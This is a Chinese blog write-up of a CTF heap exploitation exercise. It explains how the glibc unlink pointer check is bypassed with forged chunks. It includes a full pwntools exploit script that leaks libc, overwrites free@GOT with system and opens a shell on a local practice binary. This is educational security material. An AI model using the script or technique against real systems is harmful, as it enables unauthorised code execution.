<!DOCTYPE html>
<html>
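<head>
  <meta charset="utf-8">
  <!-- maximum-scale=1 dropped: it blocks pinch-zoom (WCAG 1.4.4) and adds no protection. -->
  <meta name="viewport" content="width=device-width, initial-scale=1">
  <title>heap vuln -- unlink | o0xmuhe&#39;s blog</title>
  <meta name="description" content="0x00:起因一直在堆的漏洞利用中不得要领，之前ZCTF又是三个堆的利用，血崩，chxx表哥给写了一个heap的pwn，学习学习。">
  <meta name="keywords" content="ctf">
  <meta property="og:type" content="article">
  <meta property="og:title" content="heap vuln -- unlink">
  <meta property="og:url" content="http:&#x2F;&#x2F;o0xmuhe.me&#x2F;2016&#x2F;02&#x2F;15&#x2F;heap-vuln-unlink&#x2F;index.html">
  <meta property="og:site_name" content="o0xmuhe&#39;s blog">
  <meta property="og:description" content="0x00:起因一直在堆的漏洞利用中不得要领，之前ZCTF又是三个堆的利用，血崩，chxx表哥给写了一个heap的pwn，学习学习。">
  <meta property="og:locale" content="default">
  <meta property="og:image" content="http:&#x2F;&#x2F;blogimg-10065924.cos.myqcloud.com&#x2F;heap_unlink&#x2F;o_info.png">
  <meta property="og:image" content="http:&#x2F;&#x2F;blogimg-10065924.cos.myqcloud.com&#x2F;heap_unlink&#x2F;t_sec_check.png">
  <meta property="og:image" content="http:&#x2F;&#x2F;blogimg-10065924.cos.myqcloud.com&#x2F;heap_unlink&#x2F;o_vuln.png">
  <meta property="og:image" content="http:&#x2F;&#x2F;blogimg-10065924.cos.myqcloud.com&#x2F;heap_unlink&#x2F;o_getshell.png">
  <meta property="og:updated_time" content="2016-10-06T07:27:28.000Z">
  <meta name="twitter:card" content="summary">
  <meta name="twitter:image" content="http:&#x2F;&#x2F;blogimg-10065924.cos.myqcloud.com&#x2F;heap_unlink&#x2F;o_info.png">
  <!-- "alternate" is the registered link type for a feed; the original "alternative" is not a
       keyword browsers or feed readers recognise, so /atom.xml was not auto-discoverable. -->
  <link rel="alternate" href="/atom.xml" title="o0xmuhe&#39;s blog" type="application/atom+xml">
  <link rel="icon" href="/img/favicon.png">
  <!-- Third-party stylesheet on a protocol-relative URL: it inherits the page's scheme, and this
       page is published over http: (see og:url above), so the file is fetched in the clear and
       can be altered in transit. Prefer an explicit https: href plus
       integrity="<sri-hash-placeholder>" crossorigin="anonymous" once the pinned file's hash
       has been computed. -->
  <link rel="stylesheet" href="//cdn.bootcss.com/animate.css/3.5.0/animate.min.css">
  <link rel="stylesheet" href="/css/style.css">
  <link rel="stylesheet" href="/font-awesome/css/font-awesome.min.css">
  <link rel="apple-touch-icon" href="/apple-touch-icon.png">
  <link rel="stylesheet" href="/fancybox/jquery.fancybox.css">
  <!-- Page-load progress effect (pace) -->
  <script src="/js/pace.js"></script>
  <link rel="stylesheet" href="/css/pace/pace-theme-flash.css">
  <!-- Theme runtime flags for this page; presumably read by the theme's scripts, which are not
       visible in this part of the document. The page-type booleans mark this document as a
       single post (isPost) rather than home/archive/tag/category. NOTE(review): an inline
       script cannot run under a strict script-src CSP; an external file or a per-response
       nonce would allow one. -->
  <script>
    var yiliaConfig = {
      rootUrl: '/',
      fancybox: true,
      animate: true,
      isHome: false,
      isPost: true,
      isArchive: false,
      isTag: false,
      isCategory: false,
      open_in_new: false
    };
  </script>
</head>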
<body>
  <div id="container">
    <div class="mid-col">
      <div class="body-wrap"><article id="post-heap-vuln-unlink" class="article article-type-post" itemscope itemprop="blogPost">
  
    <div class="article-meta">
      <a href="/2016/02/15/heap-vuln-unlink/" class="article-date">
      <time datetime="2016-02-15T07:21:48.000Z" itemprop="datePublished">2016-02-15</time>
</a>
    </div>
  
  <div class="article-inner">
    
      <input type="hidden" class="isFancy" />
    
    
      <header class="article-header">
        
  
    <h1 class="article-title" itemprop="name">
      heap vuln -- unlink
    </h1>
  

      </header>
      
      <div class="article-info article-info-post">
        

        
    <div class="article-tag tagcloud">
        <ul class="article-tag-list" itemprop="keywords"><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/ctf/" rel="tag">ctf</a></li></ul>
    </div>

        <div class="clearfix"></div>
      </div>
      
    
    <div class="article-entry" itemprop="articleBody">
      
          
        <h4 id="0x00-起因"><a href="#0x00-起因" class="headerlink" title="0x00:起因"></a>0x00:起因</h4><p>一直在堆的漏洞利用中不得要领，之前ZCTF又是三个堆的利用，血崩，chxx表哥给写了一个heap的pwn，学习学习。</p>
<a id="more"></a>
<h4 id="0x01"><a href="#0x01" class="headerlink" title="0x01:"></a>0x01:</h4><p>关于 heap 的 unlink 漏洞利用，出现得很早：在低版本的 libc 中，由于 unlink 没有做指针校验，可以通过构造堆块在 unlink 时实现 DWORD shoot（向任意地址写入 4 字节），从而任意代码执行。<br>学习这种漏洞，首先要了解 malloc 的工作原理，以及几种堆块的分配和使用方式。推荐文章 <a href="https://sploitfun.wordpress.com/2015/02/10/understanding-glibc-malloc/comment-page-1/" target="_blank" rel="noopener">Understanding glibc malloc</a></p>
<h4 id="0x02-文件信息"><a href="#0x02-文件信息" class="headerlink" title="0x02:文件信息"></a>0x02:文件信息</h4><p><img src="http://blogimg-10065924.cos.myqcloud.com/heap_unlink/o_info.png" alt=""></p>
<p><img src="http://blogimg-10065924.cos.myqcloud.com/heap_unlink/t_sec_check.png" alt=""></p>
<h4 id="0x03-分析"><a href="#0x03-分析" class="headerlink" title="0x03:分析"></a>0x03:分析</h4><p>程序是一个菜单式的程序，用户可以自定义所分配堆块的长度和内容。漏洞在于：edit 的时候没有做长度校验，导致可以溢出到相邻的堆块；通过精心构造数据可以 bypass libc 中 unlink 的指针校验，从而 getshell。<br><img src="http://blogimg-10065924.cos.myqcloud.com/heap_unlink/o_vuln.png" alt=""></p>
<h4 id="0x04-在drops看到的姿势"><a href="#0x04-在drops看到的姿势" class="headerlink" title="0x04:在drops看到的姿势"></a>0x04:在drops看到的姿势</h4><p><a href="http://drops.wooyun.org/tips/7326" target="_blank" rel="noopener">堆溢出的unlink利用方法</a><br>按照文中给出的方式，为了bypass</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">if</span> (__builtin_expect (FD-&gt;bk != P || BK-&gt;fd != P, <span class="number">0</span>))</span><br><span class="line">  malloc_printerr (check_action, <span class="string">"corrupted double-linked list"</span>, P);</span><br></pre></td></tr></table></figure>
<p>这么一个指针校验，需要找到一个特殊的指针 ptr：ptr 本身指向 p（p 指向堆块），<br>那么就可以根据 ptr 的地址去构造 FD 和 BK 两个指针（FD = ptr - 0xc，BK = ptr - 0x8），使得 FD-&gt;bk 和 BK-&gt;fd 都等于 p，校验即可通过。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">chunk0                malloc返回的ptr           chunk1        malloc返回的ptr</span><br><span class="line">|                     |                        |             |</span><br><span class="line">+-----------+---------+----+----+----+----+----+------+------+----+----+------+</span><br><span class="line">|           |         |fake|fake|fake|fake| D  | fake | fake |    |    |      |</span><br><span class="line">|           |         |prev|size| FD | BK | A  | prev | size&amp;|    |    |      |</span><br><span class="line">| prev_size |size&amp;Flag|size|    |    |    | T  | size | flag |    |    |      |</span><br><span class="line">|           |         |    |    |    |    | A  |      |      |    |    |      |</span><br><span class="line">|           |         |    |    |    |    |    |      |      |    |    |      |</span><br><span class="line">+-----------+---------+----+----+----+----+----+------+------+----+----+------+</span><br><span class="line">                      |--------new_size--------|</span><br><span class="line">                      list</span><br></pre></td></tr></table></figure>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">l32(<span class="number">0</span>)  +  l32(<span class="number">0x89</span>)  +  l32(list<span class="number">-0xc</span>) + l32(list<span class="number">-0x8</span>) +<span class="string">"A"</span>*(<span class="number">128</span><span class="number">-4</span>*<span class="number">4</span>)</span><br><span class="line"><span class="comment">#fake_pre_szie + fake_size + fake_FD + fake_BK + DATA</span></span><br><span class="line"><span class="comment">#   4bytes        4bytes     4bytes    4bytes    128-4*4</span></span><br><span class="line"><span class="comment">#pre_size   +   size&amp;flag</span></span><br><span class="line">l32(<span class="number">0x80</span>) + l32(<span class="number">0x88</span>)</span><br><span class="line">free(chunk_1)</span><br></pre></td></tr></table></figure>
<p>分配两个长度合适的块，在第一个块中伪造一个 chunk，并通过溢出修改第二个块的 prev_size 和 size，<br>然后 free(chunk1) 触发 unlink。</p>
<p>unlink 之后指针 p 会被改写为 ptr - 0xc，再通过 edit 覆盖 chunk_list 中保存的指针，就能达到 leak 任意地址、写任意地址的目的。</p>
<h4 id="0x05-exp"><a href="#0x05-exp" class="headerlink" title="0x05:exp"></a>0x05:exp</h4><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span 
class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line">context.update(os=<span class="string">'linux'</span>, arch=<span class="string">'i386'</span>)</span><br><span class="line">p = remote(<span class="string">'127.0.0.1'</span>,<span class="number">10001</span>)</span><br><span class="line">chunk_list = <span class="number">0x8049d60</span></span><br><span class="line">free_got = <span class="number">0x8049ce8</span></span><br><span class="line">flag = <span class="number">0</span></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">leak</span><span class="params">(addr)</span>:</span></span><br><span class="line">    data = <span class="string">"A"</span> * <span class="number">0xc</span> + p32(chunk_list<span class="number">-0xc</span>) + p32(addr)</span><br><span class="line">    <span class="keyword">global</span> flag</span><br><span class="line">    <span class="keyword">if</span> flag == <span class="number">0</span>:</span><br><span class="line">        set_chunk(<span class="number">0</span>, data)</span><br><span class="line">        flag = <span class="number">1</span></span><br><span class="line">    <span class="keyword">else</span>:</span><br><span class="line">        
set_chunk2(<span class="number">0</span>, data)</span><br><span class="line">    res = <span class="string">""</span></span><br><span class="line">    p.recvuntil(<span class="string">'5.Exit\n'</span>)</span><br><span class="line">    res = print_chunk(<span class="number">1</span>)</span><br><span class="line">    print(<span class="string">"leaking: %#x ---&gt; %s"</span> % (addr, res[<span class="number">0</span>:<span class="number">4</span>].encode(<span class="string">'hex'</span>)))</span><br><span class="line">    <span class="keyword">return</span> res[<span class="number">0</span>:<span class="number">4</span>]</span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">add_chunk</span><span class="params">(len)</span>:</span></span><br><span class="line">    <span class="keyword">print</span> p.recvuntil(<span class="string">'\n'</span>)</span><br><span class="line">    p.sendline(<span class="string">'1'</span>)</span><br><span class="line">    <span class="keyword">print</span> p.recvuntil(<span class="string">'Input the size of chunk you want to add:'</span>)</span><br><span class="line">    p.sendline(str(len))</span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">set_chunk</span><span class="params">(index,data)</span>:</span></span><br><span class="line">    p.recvuntil(<span class="string">'5.Exit\n'</span>)</span><br><span class="line">    p.sendline(<span class="string">'2'</span>)</span><br><span class="line">    p.recvuntil(<span class="string">'Set chunk index:'</span>)</span><br><span class="line">    p.sendline(str(index))</span><br><span class="line">    p.recvuntil(<span class="string">'Set chunk data:'</span>)</span><br><span class="line">    p.sendline(data)</span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">set_chunk2</span><span class="params">(index, data)</span>:</span></span><br><span class="line">    
p.sendline(<span class="string">'2'</span>)</span><br><span class="line">    p.recvuntil(<span class="string">'Set chunk index:'</span>)</span><br><span class="line">    p.sendline(str(index))</span><br><span class="line">    p.recvuntil(<span class="string">'Set chunk data:'</span>)</span><br><span class="line">    p.sendline(data)</span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">del_chunk</span><span class="params">(index)</span>:</span></span><br><span class="line">    p.recvuntil(<span class="string">'\n'</span>)</span><br><span class="line">    p.sendline(<span class="string">'3'</span>)</span><br><span class="line">    p.recvuntil(<span class="string">'Delete chunk index:'</span>)</span><br><span class="line">    p.sendline(str(index))</span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">print_chunk</span><span class="params">(index)</span>:</span></span><br><span class="line">    p.sendline(<span class="string">'4'</span>)</span><br><span class="line">    p.recvuntil(<span class="string">'Print chunk index:'</span>)</span><br><span class="line">    p.sendline(str(index))</span><br><span class="line">    res = p.recvuntil(<span class="string">'5.Exit\n'</span>)</span><br><span class="line">    <span class="keyword">return</span> res</span><br><span class="line">raw_input(<span class="string">'add_chunk'</span>)</span><br><span class="line">add_chunk(<span class="number">128</span>)  <span class="comment">#0</span></span><br><span class="line">add_chunk(<span class="number">128</span>)	<span class="comment">#1</span></span><br><span class="line">add_chunk(<span class="number">128</span>)	<span class="comment">#2</span></span><br><span class="line">add_chunk(<span class="number">128</span>)	<span class="comment">#3</span></span><br><span class="line">set_chunk(<span class="number">3</span>, <span class="string">'/bin/sh'</span>)</span><br><span class="line"><span 
class="comment">#fake_chunk</span></span><br><span class="line">payload = <span class="string">""</span></span><br><span class="line">payload += p32(<span class="number">0</span>) + p32(<span class="number">0x89</span>) + p32(chunk_list<span class="number">-0xc</span>) + p32(chunk_list<span class="number">-0x8</span>)</span><br><span class="line">payload += <span class="string">"A"</span>*(<span class="number">0x80</span><span class="number">-4</span>*<span class="number">4</span>)</span><br><span class="line"><span class="comment">#2nd chunk </span></span><br><span class="line">payload += p32(<span class="number">0x80</span>) + p32(<span class="number">0x88</span>)</span><br><span class="line">set_chunk(<span class="number">0</span>,payload)</span><br><span class="line"><span class="comment">#get the pointer</span></span><br><span class="line">del_chunk(<span class="number">1</span>)</span><br><span class="line">set_chunk(<span class="number">0</span>, <span class="string">'A'</span> * <span class="number">12</span> + p32(<span class="number">0x8049d54</span>) + p32(<span class="number">0x8049d14</span>))</span><br><span class="line">raw_input(<span class="string">'leak'</span>)</span><br><span class="line"><span class="comment">#leak system_addr</span></span><br><span class="line">pwn_elf = ELF(<span class="string">'./heap'</span>)</span><br><span class="line">d = DynELF(leak, elf=pwn_elf)</span><br><span class="line">sys_addr = d.lookup(<span class="string">'system'</span>, <span class="string">'libc'</span>)</span><br><span class="line">print(<span class="string">"system addr: %#x"</span> % sys_addr)</span><br><span class="line">raw_input(<span class="string">'edit free@got'</span>)</span><br><span class="line">data = <span class="string">"A"</span> * <span class="number">12</span> + p32(chunk_list<span class="number">-0xc</span>) + p32(free_got)</span><br><span class="line">set_chunk2(<span class="string">'0'</span>, data)</span><br><span 
class="line">set_chunk2(<span class="string">'1'</span>, p32(sys_addr))</span><br><span class="line">del_chunk(<span class="string">'3'</span>)</span><br><span class="line">p.interactive()</span><br><span class="line">p.close()</span><br></pre></td></tr></table></figure>
<p><img src="http://blogimg-10065924.cos.myqcloud.com/heap_unlink/o_getshell.png" alt=""></p>
<h4 id="0x06-参考"><a href="#0x06-参考" class="headerlink" title="0x06:参考"></a>0x06:参考</h4><ol>
<li><a href="https://sploitfun.wordpress.com/2015/02/10/understanding-glibc-malloc/comment-page-1/" target="_blank" rel="noopener">Understanding glibc malloc</a></li>
<li><a href="http://drops.wooyun.org/tips/7326" target="_blank" rel="noopener">堆溢出的unlink利用方法</a></li>
</ol>
<ul>
<li>最后还要感谢chxx大表哥的pwn和指导=。=</li>
<li>所有文件都在这里了 <a href="https://github.com/o0xmuhe/heap_pwn_study" target="_blank" rel="noopener">文件下载</a></li>
</ul>

      
    </div>
    
  </div>
  
    
    <div class="copyright">
        <p><span>本文标题:</span><a href="/2016/02/15/heap-vuln-unlink/">heap vuln -- unlink</a></p>
        <p><span>文章作者:</span><a href="/" title="访问 muhe 的个人博客">muhe</a></p>
        <p><span>发布时间:</span>2016年02月15日 - 15时21分</p>
        <p><span>最后更新:</span>2016年10月06日 - 15时27分</p>
        <p>
            <span>原始链接:</span><a class="post-url" href="/2016/02/15/heap-vuln-unlink/" title="heap vuln -- unlink">http://o0xmuhe.me/2016/02/15/heap-vuln-unlink/</a>
            <span class="copy-path" data-clipboard-text="原文: http://o0xmuhe.me/2016/02/15/heap-vuln-unlink/　　作者: muhe" title="点击复制文章链接"><i class="fa fa-clipboard"></i></span>
            <script src="/js/clipboard.min.js"></script>
            <script> var clipboard = new Clipboard('.copy-path'); </script>
        </p>
        <p>
            <span>许可协议:</span><i class="fa fa-creative-commons"></i> <a rel="license noopener" href="http://creativecommons.org/licenses/by-nc-sa/3.0/cn/" target="_blank" title="中国大陆 (CC BY-NC-SA 3.0 CN)">"署名-非商用-相同方式共享 3.0"</a> 转载请保留原文链接及作者。
        </p>
    </div>




  
</article>










    
    






</div>

    </div>








  </div>
</body>
</html>